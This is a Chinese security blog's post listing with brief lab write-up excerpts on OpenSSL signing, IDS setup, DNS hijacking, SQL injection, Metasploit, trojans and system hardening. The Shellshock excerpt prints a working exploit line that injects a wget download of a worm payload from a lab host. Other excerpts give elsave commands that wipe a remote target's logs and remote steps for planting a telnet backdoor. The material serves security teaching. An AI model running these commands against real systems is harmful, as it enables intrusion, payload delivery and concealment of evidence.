- 博客(21)
- 收藏
- 关注
RSS订阅原创 openssl数字签名
实验步骤1.创建明文文档plain.txt,写入内容。2. (打开bin目录下的exe文件运行)计算plain.txt的哈希值,输出到文件digest.txt。注意这个地方是sha1 =是数字1而不是字母L3.利用RSA算法对摘要进行签名。(1)创建1024位的RSA私钥,写入文件rsaprivatekey.pem,同时用3DES加密,设置密码。(2)从文件rsaprivatekey.pem中提取公钥,写入...
2021-11-13 17:20:53
3499
1
原创 网络入侵检测系统(IDS)的安装部署
安装snort入侵检测系统1、登录ids系统 登录实验机后,打开桌面上的putty程序,输入10.1.1.106,再点击Open.。 输入用户名:root,密码:bjhit 2、安装LAMP环境(省略) 在putty里面输入如下命令进行安装 apt-get install mysql-server libapache2-mod-php5 php5-mysql libphp-adodb 注意:因为下载时间太长,...
2021-11-13 17:18:01
2226
原创 域名劫持原理
实验步骤一实验中提供了一台邮件服务器,该服务器同时提供DNS服务,测试者通过入侵到该服务器,修改DNS服务中的正向解析与反向解析文件实现劫持。首先我们打开 http://mail.test.com,看到一个邮件登录入口。这里我们先使用burpsuite对该站点进行目录扫描。1、配置好IE代理,截取数据包。2、右键sendtospider。3、发现存在phpmyadmin。如果未出现请单击Filter将Hide empty folders(隐藏空文件夹)的勾去掉。...
2021-11-13 17:12:28
849
原创 SQL注入中information_schema的作用
实验步骤 information_schema数据库是MySQL自带的,MySQL 5以下没有这个数据库,它提供了访问数据库元数据的方式。什么是元数据呢?元数据是关于数据的数据,如数据库名或表名,列的数据类型,或访问权限等。也就是说information_schema中保存着关于MySQL服务器所维护的所有其他数据库的信息。如数据库名,数据库的表,表栏的数据类型与访问权限等。在INFORMATION_SCHEMA中,有数个只读表。 在phpmyadmin中,在左侧点击inform...
2021-11-13 17:03:31
1277
原创 Metasploit攻击win7实例
实验目的通过该实验熟悉Nessus漏洞扫描工具的安装和主机漏洞扫描的方法,学会利用Nessus扫描结果筛选合适的Metasploit攻击模块进行安全测试、攻击。Nessus基本介绍Nessus是一个功能强大而又易于使用的网络和主机漏洞评估工具,分为免费的家庭版和付费的企业版。Nessus6.0以后采取Browser/Server模式,Server端负责进行安全检查、具体的扫描任务,客户端用来配置管理服务器端。服务端采用plug-in的体系,允许用户加入执行特定功能的插件,这插件可以进行更快
2021-10-26 22:24:15
158
原创 木马攻击实验
实验目的1、 理解掌握木马运行以及传播的原理。2、 通过手动删除木马,掌握检查木马和删除木马的技巧。3、 增强对木马的安全防范意识。预备知识 木马是隐藏在正常程序中的具有特殊功能恶意代码,是具备破坏,删除和修改文件,发送密码,记录键盘,实施Dos攻击甚至完全可能告知计算机等特殊功能的后门程序。它隐藏在目标计算机里,可以随计算机自动启动并在某一端口监听来自控制端的控制信息。1、木马的传统连接技术 一般木马都采用C/S(client/server,即服务器...
2021-10-25 08:35:06
842
原创 破壳漏洞的原理与利用
使用ssh登录蠕虫发起者主机(10.1.1.231),执行下面三条命令。命令执行结果如下图所示。[root@worm-master ~]# tail /var/log/httpd/access_log[root@worm-master ~]# curl -A “() { :; }; /usr/bin/wget http://10.1.1.231/shock” http://10.1.1.12/test.cgi[root@worm-master ~]# tail /var/log/httpd/ac
2021-10-15 22:12:32
221
原创 2021-10-15
windows防火墙的高级设置“阻止对80端口的TCP连接”(即禁止访问Web服务器)打开浏览器,输入刚才测试的网站,已无法访问输入网址的IP地址,获取IP的方法为CMD里ping tools.hetianlab.com打开浏览器测试:证明网站为了安全而设置的禁ping策略...
2021-10-15 21:53:26
196
原创 系统后门种植实验-TELNET
在A主机开启手动Telnet主机A用net use命令建立ipc$连接,远程开启B主机telnet协议在B 主机查看Telnet状态用sc命令将telnet启动新建一个cmd环境进行telnet登录:telnet 10.1.1.119telnet服务登录到远程主机之后:net share建立c$共享查看共享目录远程更改telnet端口在本地主机禁止Telnet协议即可防止远程登录,或者在路由器防火墙禁止Telnet协议数据包...
2021-10-15 09:03:46
353
原创 PKI及SSL协议分析
HTTPS和HTTP的区别:https协议需要到ca申请证书,一般免费证书很少,需要交费。http是超文本传输协议,信息是明文传输,https 则是具有安全性的ssl加密传输协议 http和https使用的是完全不同的连接方式用的端口也不一样:前者是80,后者是443。...
2021-10-07 17:22:25
177
原创 安全通信协议SSH应用与分析
搭建SSH服务器 Server:安装OpenSSH.exe。 安装完成后,打开命令提示符ssh与telnet的不同点:1.telnet是明文传送;ssh是加密传送,并且支持压缩。2.telnet的默认端口号为23;ssh的默认端口号为22.3.ssh使用公钥对访问的服务器的用户验证身份,进一步提高的安全性;telnet没有使用公钥。...
2021-10-07 17:09:26
72
原创 MSSQL数据库安全
管理SQL认证模式 :在“服务器身份验证”选项区中,将身份验证模式,“Windows 身份验证模式”改为“SQL Server 和Windows 身份验证模式”,重启后在“摘要”面板中,右击“SQL Server 代理”,然后单击“启动”生效添加新用户:使winuser隶属于administrators新建数据库后将新加用户设为数据库用户添加成功后可在安全性-登录名于新数据库-安全性-用户中找到新加的用户验证用WinUser账号登录SQL Serve...
2021-09-22 15:31:27
137
原创 数据恢复原理
右键我的电脑,选中管理进行磁盘的划分与添加。使用winhex查看磁盘信息在E盘新建文本,删除后可使用winhex进行恢复也可以使用finaldata搜索相应磁盘中的删除文件进行恢复
2021-09-22 14:53:29
68
原创 Linux服务器通用安全加固
禁用不使用的用户禁用ipv6 IPv6是为了解决IPv4地址耗尽的问题,但我们的服务器一般用不到它,反而禁用IPv6不仅仅会加快网络,还会有助于减少管理开销和提高安全级别禁ping 阻止ping如果没人能ping通您的系统,安全性自然增加了,可以有效的防止ping洪水...
2021-09-14 20:35:48
73
原创 windows日志查看与清理
使用elsave清除日志工具先用ipc$管道进行连接,在cmd命令提示符下输入 net use \\对方IP(实验台IP)\ipc$ "密码" /user:"用户名"; 连接成功后,开始进行日志清除。清除目标系统的应用程序日志输入elsave.exe -s \\对方ip -l "application" -C清除目标系统的系统日志输入elsave.exe -s \\对方IP -l "system" -C清除目标系统的安全日志输入elsave.ex...
2021-09-14 20:10:35
736
原创 2021-09-14
删除、创建用户、组用户修改自己的用户密码可直接键入passwd,若修改其他用户密码需加用户名。超级用户还可以使用如下命令进行用户口令管理: passwd -l //禁用用户帐户口令 passwd -S //查看用户帐户口令状态 passwd -u //恢复用户帐户口令 passwd -d //删除用户帐户口令下面列出了chage命令的选项说明: -m days: 指定用户必须改变口令所间隔的最少天数。如果值为0,口令就不...
2021-09-14 19:59:00
73
原创 Windows Server 2008 系统加固
1.更改管理员账户名来避免此类攻击,提高系统安全性。如果更改帐户名仍然无法满足安全需求,可以选择将其禁用,然后创建一个普通的管理员账户,用户实现基本的系统或者网络管理、维护功能。删除多余用户使用NTFS文件系统检查Everyone权限WScript.Shell、Shell.application这两个组件一般一些ASP木马或一些恶意程序都会使用到。黑客在拿到webshell后,一般都是先通过这两个组件提权,为了服务器安全,应该卸载这些不安全组件。...
2021-09-14 17:52:13
87
原创 Linux档案权限篇之一
1.权限介绍连接数:每个文件都会将其权限与文件属性记录到文件系统的inode中,一个文档名就会链接一个inode。连接数就是记录有几个文档名记录到同一个inode中。用户组:这个档案所属的群组限权:第一个字符代表文档类型:d:目录;-:文件;l:链接文件(相当于快捷方式);b:设备(如硬盘);c:字符设备(鼠标、键盘)接下来三个字符为一组且为rwx的组合(可读、可写、可执行)没有改限权则再相应位置用-代替其中第一组为拥有者权限;第二组为同群组的权限;第三组为其他非本群组权..
2021-09-07 00:02:04
86
原创 Linux获取命令帮助
一共有1123个命令可被执行man date :显示详细的date的用法(manpage显示的内容文件放在/usr/share/man中)常用按键:man -f xxx :查找含有xxx的命令man -k xxx :只要含有xxx(哪怕被间隔)也可以被查找bzip2用来压缩和解压缩文件...
2021-09-06 22:54:12
100
原创 Linux 基础命令二
1.文件列表命令:ls:列出目录内容-a:列出所有目录(包括 . 开头与 .. 开头)-A:列出所有目录(不包括 . 开头与 .. 开头)-d /xxx:列出xxx目录本身但是不显示其数据信息-h:列出文件容量-l:列出文件属性限权等(ls -之后的参数可以叠加:ls -lh、ls -ad)2.cp /xx/yy/zz:将xx文件复制到zz目录下并重命名为yy-a:将文档限权、状态等一起复制-r:将资源下的目录名一并copy-f:删除目的文件存在的同名要的..
2021-09-04 20:09:57
89
原创 Linux 基础命令一
1.命令之后的参数若是单个字符用“ -”,若是单词用“ --”2.2.1.pwd:显示当前目录路径2.2.绝对路径:cd/xx/xx cd后的路径由根目录写起 相对路径:cd ../xx cd../后直接写最终文件名2.3. . :此层目录 .. :上一层目录 - :前一个工作目录 ...
2021-09-03 19:47:41
42
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人